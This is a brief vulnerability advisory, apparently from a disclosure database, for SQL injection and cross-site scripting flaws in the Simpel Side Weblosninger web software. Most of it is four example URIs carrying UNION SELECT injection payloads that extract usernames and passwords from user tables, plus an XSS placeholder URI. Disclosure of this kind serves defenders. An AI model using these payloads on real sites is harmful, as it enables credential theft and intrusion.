|
Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI. The following example URIs are available: http://www.example.com/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/* http://www.example.com/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/* http://www.example.com/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/* http://www.example.com/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/* http://www.example.com/result.php?search=[XSS] |
|
|
Privacy Statement |
